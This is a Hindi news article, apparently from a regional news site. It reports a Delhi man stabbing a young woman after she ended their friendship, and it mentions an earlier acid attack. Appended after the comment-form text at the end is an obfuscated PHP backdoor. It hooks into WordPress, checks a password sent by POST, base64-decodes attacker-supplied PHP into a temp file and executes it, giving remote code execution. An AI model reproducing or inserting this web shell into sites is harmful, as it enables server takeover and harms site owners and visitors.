दिल्ली: ब्रेकअप से नाराज प्रेमी ने प्रेमिका को मारा चाकू, युवती की हालत गंभीर

Uttarakhand Press News, 4 January 2023: दिल्ली के आदर्श नगर इलाके में एक दिल दहला देने वाला मामला सामने आया है. प्रेमी युगल के बीच हुए ब्रेकअप की वजह से प्रेमी ने प्रेमिका को चाकू मारकर घायल कर (Lover stabbed girlfriend after breakup in Delhi) दिया. लड़की अभी जिंदगी और मौत के बीच जंग लड़ रही है.

नई दिल्ली: राजधानी में युवती को दिन-दहाड़े चाकू मारने की घटना सामने आई है. कहा जा रहा है कि युवती के ब्रेकअप करने पर सिरफिरे युवक ने उसे चाकू मार (Lover stabbed girlfriend after breakup in Delhi) दिया. फिलहाल युवती बाबू जगजीवन राम अस्पताल में जिंदगी और मौत के बीच लड़ रही है.

21 वर्षीय सिमरनजीत कौर (परिवर्तित नाम) परिवार सहित केवल पार्क एक्सटेंशन इलाके में रहती है. सिमरनजीत डीयू के एसओएल से बीए की पढ़ाई कर रही है. पीड़िता ने बताया कि चार पांच साल पहले उसकी दोस्ती सुखविंदर नाम के युवक से थी. सुखविंदर दिल्ली का स्थानीय निवासी है और यहां उसका खुद का व्यवसाय है. पीड़िता ने बताया कि सुखविंदर से दोस्ती परिवार को पसंद नहीं थी इसलिए उसने धीरे-धीरे सुखविंदर से दूरी बनानी शुरू कर दी.

इससे पहले भी एक ऐसा ही मामला सामने आया था, जिसमें बात न करने पर सिरफिरे युवक ने एक युवती पर तेजाब फेंक दिया था. हालांकि आरोपी और पीड़िता, दोनों एक दूसरे को पहले से जानते थे लेकिन दोनों में अनबन होने के बाद युवती ने युवक को नजरअंदाज करना शुरू कर दिया था, जिससे नाराज होकर आरोपी ने इस घटना को अंजाम दिया था. युवती कक्षा 12 की छात्रा थी. मामले मे त्वरित कार्रवाई करते हुए पुलिस ने 12 घंटे के अंदर ही मामले को सुलझा लिया था और तीन युवकों को गिरफ्तार कर लिया था.

Read Previous

उत्तरकाशी: पिंडकी गांव के एक घर में लगी भीषण आग लगने से घर जलकर खाक

Read Next

जम्मू और कश्मीर के सांबा में अंतरराष्ट्रीय सीमा पर लगाया गया रात का कर्फ्यू

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}